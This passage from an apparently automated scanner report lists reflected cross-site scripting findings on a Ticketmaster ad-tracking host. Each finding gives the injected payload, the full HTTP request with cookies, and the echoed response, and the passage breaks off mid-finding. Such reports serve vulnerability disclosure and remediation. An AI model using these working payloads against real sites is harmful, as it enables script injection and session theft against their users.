Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 407
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster/AirCanadaCentre8bff1"><script>alert(1)</script>63db032276e/L12/841953991/x01/USNetwork/Ticketmaster_DumpCampaign/1x1Pixel.gif/726348573830334f56626741436d4566?x" target="_blank">
...[SNIP]...

4.51. http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/AirCanadaCentre/11408426983@x01

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5039"><script>alert(1)</script>d70de5c134c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ticketmaster/AirCanadaCentre/11408426983@x01b5039"><script>alert(1)</script>d70de5c134c? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:13 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 339
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster/AirCanadaCentre/367540465/x01b5039"><script>alert(1)</script>d70de5c134c/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

4.52. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [&_RM_HTML_artist1_name_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the &_RM_HTML_artist1_name_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82e01'-alert(1)-'e534d92780 was submitted in the &_RM_HTML_artist1_name_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u282e01'-alert(1)-'e534d92780&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38440
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='u282e01'-alert(1)-'e534d92780';
var event_name='U2%20360%BA%20Tour';
var event_date='07/20/2011';
var event_time_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowla
...[SNIP]...

4.53. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85730"><script>alert(1)</script>f252ad4c94c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ticketmaster85730"><script>alert(1)</script>f252ad4c94c/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 336
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster85730"><script>alert(1)</script>f252ad4c94c/ZAP/1178896253/x01/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.54. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dad46"><script>alert(1)</script>3c85ca57b59 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ticketmaster/ZAPdad46"><script>alert(1)</script>3c85ca57b59/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:20 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 395
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster/ZAPdad46"><script>alert(1)</script>3c85ca57b59/L12/947680874/x01/USNetwork/Ticketmaster_DumpCampaign/1x1Pixel.gif/72634857383031536e39414143615847?x" target="_blank">
...[SNIP]...

4.55. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8b26"><script>alert(1)</script>27080269c9d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ticketmaster/ZAP/1@x01e8b26"><script>alert(1)</script>27080269c9d?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 328
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster/ZAP/1439981957/x01e8b26"><script>alert(1)</script>27080269c9d/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.56. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_artistid_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_artistid_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8408b'-alert(1)-'670ae3e33cf was submitted in the _RM_HTML_artistid_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=13082498408b'-alert(1)-'670ae3e33cf&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
e='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='13082498408b'-alert(1)-'670ae3e33cf';
var majorcatid='10001';
var minorcatid='1';

// For Purchase Tracking
var b3_d = new Image (1,1);
var b3_e = new Image (1,1);
var b3_f = new Image (1,1);
var b3_g = new Image (1,1);
var b
...[SNIP]...

4.57. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_bstate_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_bstate_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74593'-alert(1)-'8932d5799 was submitted in the _RM_HTML_bstate_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=74593'-alert(1)-'8932d5799&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38439
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='74593'-alert(1)-'8932d5799';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='10001';
var minorcatid='1';

// For Purchase Tracking
var b3
...[SNIP]...

4.58. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_bzip_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_bzip_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35295'-alert(1)-'a3368e69539 was submitted in the _RM_HTML_bzip_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

